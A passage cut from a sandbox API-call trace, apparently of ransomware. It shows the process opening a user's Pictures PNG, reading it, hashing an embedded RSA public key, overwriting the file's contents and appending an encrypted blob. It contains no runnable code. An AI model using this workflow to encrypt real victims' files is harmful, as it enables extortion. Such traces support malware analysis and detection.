ftLastAccessTime.dwHighDateTime=0x1d8a49e, ftLastWriteTime.dwLowDateTime=0x660dad30, ftLastWriteTime.dwHighDateTime=0x1d8a49e, nFileSizeHigh=0x0, nFileSizeLow=0xda28, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Vuc5gUsp1H33w.png", cAlternateFileName="VUC5GU~1.PNG")) returned 1 [0191.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38a0 [0191.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0191.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38a0 | out: hHeap=0x2c0000) returned 1 [0191.431] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\Vuc5gUsp1H33w.png") returned=".png" [0191.431] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\Vuc5gUsp1H33w.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\vuc5gusp1h33w.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0191.432] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=55848) returned 1 [0191.432] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0191.435] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xda02, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.435] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0191.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0191.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.438] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.438] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xda28, lpOverlapped=0x0) returned 1 [0191.439] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0191.439] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.439] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.439] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0191.440] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0191.440] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0191.440] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0191.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0191.440] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0191.440] GetLastError () returned 0x0 [0191.441] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0191.441] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0191.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.441] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0191.441] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0191.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.441] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0191.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xda30) returned 0x2af5168 [0191.442] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0191.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0191.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0191.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0191.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38a0 [0191.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6038 [0191.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6050 [0191.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6080 [0191.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60e0 [0191.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6098 [0191.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0191.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0191.443] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0191.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0191.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6080 | out: hHeap=0x2c0000) returned 1 [0191.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6098 | out: hHeap=0x2c0000) returned 1 [0191.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60e0 | out: hHeap=0x2c0000) returned 1 [0191.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0191.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60e0 [0191.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0191.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6098 [0191.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0191.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6080 [0191.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0191.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0191.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0191.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0191.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0191.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0191.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0191.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0191.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6098 | out: hHeap=0x2c0000) returned 1 [0191.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6080 | out: hHeap=0x2c0000) returned 1 [0191.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0191.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0191.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60e0 | out: hHeap=0x2c0000) returned 1 [0191.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0191.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0191.446] GetCurrentThreadId () returned 0x5d8 [0191.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0191.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae5bf8 [0191.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0191.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0191.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0191.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0191.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0191.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0191.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.447] GetCurrentThreadId () returned 0x5d8 [0191.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0191.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0191.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0191.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0191.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0191.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0191.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0191.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60e0 [0191.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0191.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0191.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0191.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0191.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0191.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0191.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0191.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6080 [0191.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0191.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0191.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0191.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0191.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0191.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0191.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6098 [0191.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0191.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0191.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0191.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6068 [0191.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0191.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae60f8 [0191.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0191.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60c8 [0191.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60b0 [0191.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0191.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6110 [0191.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60b0 | out: hHeap=0x2c0000) returned 1 [0191.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae60b0 [0191.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60c8 | out: hHeap=0x2c0000) returned 1 [0191.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0191.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0191.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0191.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0191.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0191.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6080 | out: hHeap=0x2c0000) returned 1 [0191.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6080 [0191.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0191.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0191.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60e0 | out: hHeap=0x2c0000) returned 1 [0191.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0191.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6110 | out: hHeap=0x2c0000) returned 1 [0191.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0191.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0191.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0191.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0191.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6080 | out: hHeap=0x2c0000) returned 1 [0191.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0191.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0191.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0191.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0191.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0191.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0191.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0191.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0191.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0191.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0191.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0191.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60b0 | out: hHeap=0x2c0000) returned 1 [0191.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60f8 | out: hHeap=0x2c0000) returned 1 [0191.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0191.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6098 | out: hHeap=0x2c0000) returned 1 [0191.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6068 | out: hHeap=0x2c0000) returned 1 [0191.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0191.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0191.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0191.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6050 | out: hHeap=0x2c0000) returned 1 [0191.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0191.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0191.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0191.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0191.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0191.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0191.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0191.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0191.463] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xda23, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xda23, lpOverlapped=0x0) returned 1 [0191.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0191.464] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xda28, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.464] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0191.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0191.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0191.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0191.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0191.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0191.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: 